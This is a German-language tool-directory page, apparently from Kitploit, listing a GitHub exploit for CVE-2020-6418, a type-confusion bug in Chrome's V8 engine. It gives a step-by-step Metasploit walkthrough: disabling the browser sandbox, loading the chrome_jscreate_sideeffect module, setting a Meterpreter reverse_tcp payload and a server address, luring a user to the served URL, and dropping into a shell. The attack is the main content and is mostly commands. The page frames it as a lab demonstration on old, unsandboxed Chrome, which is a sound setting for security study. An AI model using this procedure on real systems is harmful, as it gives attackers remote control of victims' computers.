Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
Exploit-FrameworksPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstests
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

Exploit für CVE-2020-6418, eine Typverwechslung in V8, die Remote-Codeausführung über eine manipulierte HTML-Seite ermöglicht. Verwendet Metasploit, um eine Reverse-Shell-Payload zu liefern.

Repository anzeigen
113vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-6418

Die CVE-2020-6418 betrifft die Typverwechslung in V8 in Google Chrome. Die betroffenen Versionen waren älter als 80.0.3987.122. Die Schwachstelle wird von einem entfernten Angreifer ausgenutzt, der über eine manipulierte HTML-Seite auf die Shell eines Zielgeräts zugreift.

Umgebungsanforderungen

  1. Google Chrome mit einer Version älter als 80.0.3987.122 .
root@kitploit:~
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
  1. Metasploit Framework
  2. Betriebssystem : Beliebig

Exploit-Einrichtung

  1. Google Chrome Version v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

Google Chrome ohne Sandbox einrichten

i) Erstellen Sie eine Verknüpfung für Google Chrome
ii) Klicken Sie auf Eigenschaften > gehen Sie zur Option namens „Target“
iii) Fügen Sie am Ende der EXE nach einem Leerzeichen -no--sandbox hinzu
iv) Klicken Sie auf Übernehmen > OK
v) Öffnen Sie ein neues Google-Chrome-Fenster. Dort wird ein Pop-up mit folgendem Inhalt angezeigt.

root@kitploit:~
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

Demonstration zum Deaktivieren der Sandbox

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

Metasploit verwenden

Da wir Kali als Umgebung für die Durchführung des Exploits verwenden, ist Metasploit als integriertes Tool in der Distribution enthalten. Wenn Sie jedoch andere Distributionen verwenden, müssen wir Metasploit einrichten, bevor wir mit dem Exploit beginnen.

Für weiterführende Informationen siehe die Metasploit-Installation.

Durchführen des Exploits

i) Starten des Metasploit-Frameworks

root@kitploit:~
> msfconsole

ii) Den Exploit finden

root@kitploit:~
> search chrome_js

iii) Den verfügbaren Exploit aus der obigen Ausgabe verwenden

root@kitploit:~
> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) Die SRVHOST-IP-Adresse angeben

root@kitploit:~
> set SRVHOST <ip address>

v) Das Ziel angeben Hier gibt es zwei Optionen

  1. Ziel 0 : Für Windows
  2. Ziel 1 : Für Mac
root@kitploit:~
> set Target " Number "

vi) Payload angeben

root@kitploit:~
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) Zum Überprüfen der aktuellen Einstellungen und aktivierten Optionen.

root@kitploit:~
> show options

viii) Zum Ausführen des Exploits

root@kitploit:~
> run (or) > exploit

ix) Sie erhalten eine URL, die im Browser aufgerufen werden muss, damit die Sitzung aktiv wird.

x) Sobald der Benutzer die URL aufruft, wird eine Sitzung erstellt. Um dies zu überprüfen

root@kitploit:~
> show sessions

xi) Mit der Sitzung können wir die Systeminformationen des Benutzers abrufen / in die Shell wechseln.

root@kitploit:~
> sessions <number>
> shell

Demonstration zum Ausführen des Exploits

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

Tool herunterladen